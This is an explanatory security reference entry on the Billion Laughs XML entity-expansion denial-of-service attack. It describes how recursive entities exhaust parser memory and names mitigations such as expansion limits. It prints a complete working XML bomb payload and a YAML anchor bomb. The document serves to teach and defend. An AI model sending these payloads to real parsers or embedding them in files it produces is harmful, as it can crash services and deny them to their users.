Billion Laughs Attack

Description

The Billion Laughs attack (or XML Bomb, XML Entity Expansion) is a type of denial-of-service attack against XML parsers. It exploits the recursive nature of XML entities by defining an entity with a very large number of references to itself, causing the XML parser to consume excessive amounts of memory and CPU resources.

Details

Here’s how the attack works:

1. The attacker crafts an XML document with a definition of an entity that contains a reference to itself multiple times.
2. The XML parser attempts to parse the document and expand the entity.
3. Due to the recursive nature of the entity, the parser ends up expanding it exponentially, consuming a large amount of memory and CPU resources.
4. This can lead to the exhaustion of system resources, causing the XML parser to crash or become unresponsive.

The name “Billion Laughs” comes from the fact that the attack involves defining an entity with a reference to itself multiple times, creating a chain reaction that can potentially expand to a billion or more references. The payload itself has historically contained the word lolz. This attack highlights a vulnerability in XML parsers that can be exploited by malicious actors to disrupt the functioning of XML processing systems. To mitigate the risk of Billion Laughs attacks, XML parsers need to implement safeguards such as limits on entity expansion and depth of recursion.

Examples

An example of the payload is

<?xml version="1.0"?>
<!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Any file format that supports macro expansions could be vulnerabile to a Billion Laughs attack. One example is the YAML bomb.

a: &a ['lol', 'lol', 'lol', 'lol', 'lol', 'lol', 'lol', 'lol', 'lol']
b: &b [*a, *a, *a, *a, *a, *a, *a, *a, *a]
c: &c [*b, *b, *b, *b, *b, *b, *b, *b, *b]
d: &d [*c, *c, *c, *c, *c, *c, *c, *c, *c]
e: &e [*d, *d, *d, *d, *d, *d, *d, *d, *d]
f: &f [*e, *e, *e, *e, *e, *e, *e, *e, *e]
g: &g [*f, *f, *f, *f, *f, *f, *f, *f, *f]
h: &h [*g, *g, *g, *g, *g, *g, *g, *g, *g]
i: &i [*h, *h, *h, *h, *h, *h, *h, *h, *h]

Sources:

• https://en.wikipedia.org/wiki/Billion_laughs_attack
• https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html
• https://www.zaproxy.org/docs/alerts/40044/
• https://cwe.mitre.org/data/definitions/776.html